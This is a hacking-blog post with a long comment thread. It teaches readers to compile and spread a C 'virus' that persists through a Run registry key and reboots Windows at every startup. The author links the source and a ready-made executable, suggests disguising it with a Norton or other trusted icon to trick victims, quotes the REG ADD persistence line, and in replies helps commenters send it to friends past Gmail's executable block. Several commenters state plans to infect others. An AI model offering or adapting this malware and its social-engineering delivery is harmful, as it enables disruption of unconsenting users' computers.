A Virus Program to Restart the Computer

A Virus Program to Restart the ComputerIn this post, I will show you how to create a virus to restart the computer at every startup. That is, upon infection, the computer will get restarted every time the system is booted. As a result, the computer will become inoperable as it reboots again as soon as the desktop is loaded.

For this, the virus needs to be executed only once and from then on, it will carry out rest of the operation on its own. I have programmed this virus using the C language. If you are familiar with the C language then it is too easy to understand the logic behind the coding. The code is not posted here in this article, but you can download it from the link below.

Compiling the source code into an executable module:

  1. Download the Source Code Here.

  2. UnRar the file and you should see the source code: Sysres.C

  3. For a step-by-step compilation guide, refer my post: How to compile C Programs?

Testing and removing the virus from your PC:

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by following the below mentioned steps:

  1. Reboot your computer in the safe mode.

  2. Go to:

    %systemroot%\Windows\System
    (%systemroot% can be C,D,E or F)

  3. You will find a file by name sysres.exe, delete it.

  4. Type regedit in run. You will go to the registry editor. Here navigate to:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

    There, on the right site you will see an entry by name “sres“. Delete this entry. That’s it. You have now removed this virus successfully.

Logic Behind the working of this virus program:

If I do not explain the logic(Algorithm) behind the working of the virus program, I think this post would become an incomplete one. So I’ll explain the logic in a simplified manner without getting much into the technical aspects of the program. If you have further doubts, you can pass your comments.

LOGIC:

  1. First the virus will find the Root partition (Partition on which Windows is installed).

  2. Next, it will determine whether or not the virus file (sysres.exe) is already copied into %systemroot%\Windows\System.

  3. If not it will just place a copy of itself into %systemroot%\Windows\System and makes a registry entry to put this virus file into the Windows startup.

  4. Or else if the virus is already found in the %systemroot%\Windows\System directory (folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

How to change the icon of the executable module (This step is optional):

After you compile, the sysres.exe file that you get will have a default icon. If you send this file to your friends they may not execute it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example, you can change the icon into Norton antivirus ICON itself so that the people seeing this file believes that it is Norton antivirus. Or you can change its ICON into the ICON of any popular or trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How to Change the ICON of an EXE File?

79 Comments

  1. Srikanth
    October 27, 2008 at 6:23 AM

    @ poppernut

    I have used Borland C++ 32 bit compiler.

    Here is the download link and help on how to install and configure the compiler.

    http://dn.codegear.com/article/20633


  2. Poppernut
    October 27, 2008 at 1:57 AM

    I am having trouble with the compiler. is it possible for me to download the exe file with having to do the compiling?


  3. Poppernut
    October 28, 2008 at 12:04 AM

    The borland compiler is acting weird and it is impossible for me to accomplish anything. I tried Dev-C++ Compiler. Every thing works exept one thing. The line

    struct ffblk ffblk;//File block structure
    it says “Aggregate ffblk ffblk has incomplete type and cannot be defined”

    Any Idea?

    I know i asked this last time, but can i download the exe file alone?


  4. Srikanth
    October 28, 2008 at 6:09 AM

    @ poppernut

    replace the line

    struct ffblk ffblk

    with the following line and try

    struct ffblk {
    char ff_reserved[21];
    char ff_attrib;
    int ff_ftime;
    int ff_fdate;
    long ff_fsize;
    char ff_name[13];
    }ffblk;


  5. Poppernut
    October 28, 2008 at 9:03 PM

    Lines:

    done=findfirst(quot;C:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;D:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;C:\\windows\\system\\sysres.exequot;,amp;ffblk,0);

    done=findfirst(quot;F:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;E:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    else

    {
    system(quot;REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
    \\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\sysres.exequot;);

    }
    And all of the

    if(done==0)

    lines have errors.

    It is possible that is has to with the compiler i am using, for it does not use command lines. I can#39;t use the borland one though. It keeps messing up.

    This project must be done by Friday for me. I have a schedule to stick too. I can look for something else meanwhile. Sorry to be complaining this much. s it posible for me to download the exe version of the file, after it has been compiled? That would make this much easier. Thank you for helping me with this matter.


  6. Poppernut
    October 28, 2008 at 9:13 PM

    I tried the borland compiler again. This time, when i try to open the bcc32, it flashes. Is there another file i should be opening?


  7. Srikanth
    October 29, 2008 at 7:34 AM

    @ poppernut

    You can use Borland c++ 3.0 (16-bit compiler) also.

    C++ 5.5 can only be used via commandline.You have to access Bbcc32 via commandline.

    The syntax for compiling is Bbcc32 filename.c

    The compiled exe file will be in the same directory as of bcc32.exe.

    Anyways leave it if you find some difficulty.I’ll send the compiled project itself.

    The download link is

    http://rapidshare.com/files/158582448/Sysres.rar


  8. Poppernut
    October 29, 2008 at 10:50 PM

    It worked. Thank you very much. I appreciate it. I also love your site. (If i understand correctly, your the host) The most useful of all is the “How to block websites.” Thanks :)


  9. Srikanth
    October 30, 2008 at 6:59 AM

    Thanks for your kind support…


  10. Anonymous
    October 30, 2008 at 7:33 PM

    thanks for your valuable assist.

    Good Luck


  11. Uriel
    November 11, 2008 at 6:54 AM

    Srikanth, thanks for sharing your knowledge in programming with us we appreciate it and good luck with the site! By the way, is it possible for me to change the file size of the exe file? i want it to look like a legit program or maybe you could teach me how to inject it into a legit file so that in the installation it would run with the legit program. thank you.


  12. Srikanth
    November 11, 2008 at 1:27 PM

    @ uriel,

    This is a bit difficult task.For that I should write a new post with all details.

    But you can definitely change the icon of the .exe file to resemble any legit program which I have already discussed!


  13. Uriel
    November 11, 2008 at 3:48 PM

    @ srikanth,

    Thanks for that and I did changed the icon to camouflage it just as you discussed in your post, I appreciate your work a lot, I just tried it and wow it scared me alright, now I’ve got some questions. When the virus ran it shows the cmd window “C://Windows/System/sysres.exe” If the person I sent this to (don’t worry he’s a bad guy)acted fast enough within the 60 seconds time limit and deleted the sysres.exe file in the system folder (not in safe mode) but he did not delete the registry entry, will this virus still work? And one more thing if I used notepad (save the source code as .exe) to create the exe file instead of C++ will it work? I’m sorry for the numerous questions but I really want to learn. Thanks!!!


  14. Srikanth
    November 11, 2008 at 5:41 PM

    @ uriel

    If it is deleted once it doesn’t work(even though the entry exists in the registry)

    But it is not possible to create a .exe file using a notepad.You should use C++ compiler only..


  15. Anonymous
    November 18, 2008 at 8:08 AM

    sir, suppose i have a exe file in my pendrive. now my question is is it possible that whenever i connect my pendrive the exe file should automatically get executed. if yes please help me out.sir give me the step by step procedure.


  16. C J Chua
    November 19, 2008 at 5:36 PM

    Hi Srikanth; I think my niece’s computer got infected with your virus, I tried to get into safe mode in order to delete sysres.exe and remove sres via regedit but it restarted everytime on selecting safe mode, please advise, thanks.


  17. Srikanth
    November 20, 2008 at 7:11 AM

    @ C J Chuha

    If your system is restarting even in the safe mode,then it’s definitely not because of my virus.The virus becomes active only when the system is booted normally and not during the safe mode.So,please check your system for other faults!


  18. il-muxu
    November 25, 2008 at 7:58 PM

    i downloaded the virus file you posted and tested it but the computer didn’t restart automatically! what do you think is the problem?


  19. Srikanth
    November 26, 2008 at 1:31 PM

    @ il-muxu

    It’ll restart from the next boot.That is the infection will come to effect from the next boot


  20. il-muxu
    November 26, 2008 at 4:43 PM

    yes i did manually reboot the system after i pressed sysres but when it turned on again it stayed on, it didn’t restart pls help.
    thanks for the quick response


  21. yuvaraj
    December 14, 2008 at 8:26 AM

    “THB” virus has affected my pc,how can i remove it please help me sir,


  22. Srikanth
    December 14, 2008 at 11:49 AM

    @ yuvaraj

    Install a good antivirus/antispyware and update it so that the updates are up to date.Then perform full system scan to remove the virus.Recommended antivirues are

    Kaspersky
    Norton
    Bitdefender


  23. Mobin
    December 16, 2008 at 7:03 AM

    nice work man, really cool virus!!

    i wanted to know if there’s a virus, written in C, which can delete certain files so that the computer never boots again??


  24. 27
    December 16, 2008 at 7:12 AM

    Not bad, but why don’t you use getenv(“WINDIR”) to find the root partition? It would clean up your code, make it more readable, and increse its speed.


  25. Srikanth
    December 16, 2008 at 11:18 AM

    @ Mobin

    Yah,It’s possible to write such a virus…I’ll show how to write such a virus in my coming posts…..


  26. VISHAL
    December 17, 2008 at 12:49 PM

    hi, Shrikant Myself vishal rathore
    you have programmed many viruses.i want to know ,
    Have u programmed any antivirus?


  27. Srikanth
    December 17, 2008 at 3:57 PM

    @ Vishal

    Only virus progrmming till now.AV programming requires much more greater skills.


  28. jody
    December 17, 2008 at 10:15 PM

    Thanks for yer time and effort. nice page


  29. Zals
    December 18, 2008 at 10:36 PM

    Hey Srikanth,i Appreciate ur knowledge and great works..and another thing i like in you is ur gud heart to share ur knowledge with us :)
    keep it up dude…nice website :)


  30. Srikanth
    December 18, 2008 at 11:41 PM

    @ Zals

    Thanks you for your kind support.It keeps me motivating!! :)


  31. VISHAL
    December 19, 2008 at 12:30 PM

    Thanks for your reply…………..
    please give me your email id if you have no prob….
    bcoz i want to discuss some problem of my project with you.


  32. Srikanth
    December 19, 2008 at 7:46 PM

    @ Vishal

    Just send ur problem through the contact form on this site.Later I’ll reply from my ID….


  33. vishal
    December 22, 2008 at 5:08 PM

    i want to know where are you.
    i want to know i am doing aproject on virus and antivirus.
    this is my M.Tech. degree project.
    so how can i start my project.
    what is the basic thing that can help me in understanding virus and antivirus programming………………


  34. vishal
    December 22, 2008 at 5:09 PM

    thanks for ur reply.
    i want to become your friend…………………


  35. Srikanth
    December 23, 2008 at 12:14 AM

    @ Vishal

    My email is admin@gohacking.com….

    You can contact me through this ID…


  36. raf
    December 25, 2008 at 1:56 AM

    hi srikanth i went through your page, nice. i wanted to know can i find and delete thb virus without an antivirus .


  37. jets
    December 26, 2008 at 10:18 PM

    can i just download the virus and use it?
    i dont understand the codes


  38. Srikanth
    December 26, 2008 at 10:21 PM

    @ jets

    Yes you can download & use it without any problem.After testing it please follow the above mentioned info to remove it.


  39. jets
    December 26, 2008 at 10:55 PM

    by remove u meant the steps about safe bootign then go to windows drive and delte then edit registry for it right?
    what if i test this on another old computer and wat do i do with this file, like the one i compiled and never opened?can i put it in recycle bin?
    thanks


  40. naggappan
    December 30, 2008 at 11:14 PM

    I have compiled this pgm in the borland c++ (32-bit)compiler every thing works properly. But the only thing is it is not locking in the registry start up programs automatically when the exe file is clicked. but if i add it manually in the registry it works properly.

    is any wrong in the line ,

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”);

    or do i have problem only in my compiler..


  41. Srikanth
    December 30, 2008 at 11:40 PM

    @ naggappan

    Are u using an antivirus with proactive defense?

    May I know which antivirus r u using?

    Compile the source by downloading it.Do not copy-paste the program…


  42. Slim0123
    December 31, 2008 at 12:41 AM

    Nice work Srikanth, but if you would use something like windows.h in the header file and will attach the exe with some ecard(flash exe files) then I think it would not even create any suspicion in the user’s mind, so better mask your programs before sending them to anyone else

    and one more problem is that, these dos based programs are not intended to work on different platforms(if you compile in 64bit machine, it will not work on 32bit and vice versa) so better if you could resolve this problem too(i m a newbie so better you let me know if I m wrong instead of just letting go the post)


  43. Srikanth
    December 31, 2008 at 12:21 PM

    @ Slimright

    The program that I have written is just a simple virus that can be coded in C.

    For advanced virues we have to make use of TSR concept.


  44. raj
    January 10, 2009 at 10:05 PM

    thanks but its not working in vista anymore…!!!


  45. Srikanth
    January 11, 2009 at 12:06 PM

    @ raj

    It works in vista, but UAC must have been disabled…


  46. Shaan
    January 14, 2009 at 2:25 AM

    Nice work srikanth….This is a great site.. Different from others.. Nice place to share knowledge abt a subject where nowhere else we’ll get 2 knw as its unsafe to visit most of d hacking sites. Keep goin.


  47. Srikanth
    January 14, 2009 at 10:29 AM

    Thanks for your support..


  48. Poppernut
    January 15, 2009 at 3:27 AM

    For those of you who are trying out the program and it is not displaying the message, DEP (Data Execution Prevention) might be the culprit.


  49. vishal
    January 15, 2009 at 5:40 PM

    hi shrikant,
    want to know about the virus signature.
    can u help me.


  50. Srikanth
    January 15, 2009 at 6:27 PM

  51. Jiyar
    January 17, 2009 at 1:48 AM

    hii Srikanth can i just download the virus and use it???
    if Yes Give Me a link plz i cant’ use rapidshare.com or send it to my email


  52. Nilesh
    January 25, 2009 at 12:29 PM

    Cool site dude :-):-) how to create a virus that run automatically without d execution


  53. av
    January 26, 2009 at 5:58 AM

    @nilesh
    This is an advance mode of programming. You must first knew how to code on assembly language programming (low level programming). Then, the vulnerability of a certain Operating system or a targeted running program which can connect to network (such as lsass.exe). These are also called exploits, a techniques used by most viruses to spread quickly.

    i recommend the following link:
    http://www.governmentsecurity.org/articles/IntroductiontoBufferOverflow.php


  54. Joel
    January 27, 2009 at 10:25 PM

    yeah i cant get the source and when i use my normal dev c++ i get problems visual studio doesn’t work either. Plus rapidshare is just screwed up for me. Would it be too much trouble for me to ask you to zip both the source and the .exe and post it on mediafire?


  55. Nilesh
    January 28, 2009 at 3:41 PM

    @av
    hey thanks……


  56. Monik
    February 6, 2009 at 7:19 PM

    Hey, cool program man, i have just started learning hacking, but i understant your programs quiet well. I have thrashed many computers throught this exploits and then i only repaired them and gained the fame in my college. thanks sri for providing such information. i’ll be going through all your all your articles turn by turn. coz, now my ultimate aim is to become hacker. thanks again.


  57. ricky
    February 13, 2009 at 3:09 PM

    the .exefile doesn’t work…..system doesnot restart.
    there was no file named sres in the registry plz help


  58. Rajiv
    February 14, 2009 at 5:26 PM

    Can you teach us to make mobile virus using notepad??? I have got 4 mobile virus codes made in notepad– Cabir and Skulls…. Can you help us make more???? Like Curse of Silence??? And is Black Wolf a dreadly virus??? I have just heard its name…


  59. zeroday
    February 15, 2009 at 3:02 AM

    i dont know why u always keep on finding the root dir which can e done thru GetSystemDirectory() function


  60. nik
    February 17, 2009 at 12:37 PM

    hi can u pls help me 2 put som virus into our coll servers


  61. sid
    February 20, 2009 at 5:49 PM

    u have some cool ideas.make some more bright ideas to share with us


  62. Daniel Tatsuki
    February 24, 2009 at 8:30 PM

    Love this site. I can’t wait to infect a friends comp with this. Hehehe.


  63. Karthik
    March 3, 2009 at 6:51 PM

    Hi…….I’ve been having a problem with my comp……..the THB virus has affected it ‘n I’m not able to remove it with my norton which was updated only 3 weeks ago(I’m not able to do so now ‘coz I’m unable to renew it)……..the problem here is my system seems to be linked to the antivirus…..if i delete it to install sumthing like caspersky or avg my system crashes…..I’m at my wits end!!!!….I really need da comp now ‘n I’m not able to use it properly!………..plz help!!!!!


    • Srikanth
      March 5, 2009 at 2:33 PM

      @ Karthik

      Try the following.

      in your c: drive first enable show hidden file in folder option after that in c drive you can see two hidden files 1. .icon (with the same
      picture that you see as drive icon)and 2. autorun.inf delete both and restart system……..

      If the above method doesn’t work I recommend you to format and re-install your OS.


  64. Anmaya
    March 13, 2009 at 4:02 PM

    Hi! My Pc is infected by a virus that logs off my computer at every time i start my computer.If i try to login again.It immedeately logs off again.PLZ HELP.


    • Srikanth
      March 13, 2009 at 9:26 PM

      @ Anmaya

      Reboot your PC in the safe mode. To reboot in Safe mode press F8 as soon as your System boot is started. in the safe more goto run and type the folloring in run box

      msconfig ans press enter

      In the System configuration Window open the Startup tab. There you’ll see the entry for the virus that is causing the restart. Uncheck the tick mark against it. Reboot your system normally. Everything should be OK from now on…


  65. john
    March 21, 2009 at 12:10 PM

    Dear Srikanth (author),

    Have a wonderful day !

    i wanted to send this virus to my friend just for fun , but i was unable to send , it says that it is an executable files and you cannot send this type of files for gmail security reasons. PLEASE HELP here!!!

    John


    • Srikanth
      March 21, 2009 at 7:37 PM

      @ john

      Send it using Yahoo OR upload it to rapidshare and ask your friend to download it by sending the download link via email.


  66. Dhiraj Singh
    March 23, 2009 at 8:27 PM

    Now That is Something Real Stuff……

    Really a very good site for people who want to do something different with ” C “. Really Boss heads off to you.

    Tell me one thing can we upload our codes on your site….so that the knowledge can be shared….only if you allow.

    This is my idea…you keep on rocking man….Gud Luck


    • Srikanth
      March 24, 2009 at 1:12 PM

      @ Dhiraj Singh

      You can share codes but it requires prior approval.


  67. Dhiraj Singh
    March 23, 2009 at 9:50 PM

    Hi Bro…..

    Can We do multithreading with “turboc”.

    or any other method of running two diff process simultaneously with a 16bit C program.


    • Srikanth
      March 25, 2009 at 8:18 PM

      @ Dhiraj Singh

      Trubo C doesn’t suport multithreading.. Dev C++ will support it..


  68. Dhiraj Singh
    March 24, 2009 at 5:43 PM

    Bro Wat about Multithreading…..

    and one more thing that how to edit registry as you have done…in above code. Can you share some more knowledge on this ….. or any other link which can be useful. Plz Reply soon i m eagerly waiting.

    Thanks Bro for sharing your valueable knowledge….really a great job.


  69. Dhiraj Singh
    March 24, 2009 at 7:40 PM

    Sir,

    The Above Code is not working in Turbo c editor.
    System Command is having no effect…no registry Tweak is Happening. What is the Reason and wat is the solution.


  70. Shashank
    March 30, 2009 at 10:34 AM

    Shrikant, u r simply genius…


  71. MithunRulz
    April 8, 2009 at 10:37 AM

    Heya!!!!

    Well In Ma College Downloading Is Blocked And Aceesing Orkut Is Even Blocked!! :(

    Can U Tell Me Some Wayz To Bypass The Server And Den Download Or Acess Orkut??

    Thnx Man And Ur Site Rulz :D


  72. MithunRulz
    April 8, 2009 at 10:39 AM

    And About Antiviruses I Think Also Dat Avira Antivir Is Also Cool….Wat Do U Think??


  73. Hrithik
    April 9, 2009 at 7:33 PM

    what is the process of the restart virus..can you help me?


  74. Raj Singh
    April 13, 2009 at 1:00 AM

    above code is not working properly
    with turbo c++4.5 ver.
    pls help me out to the solve the problem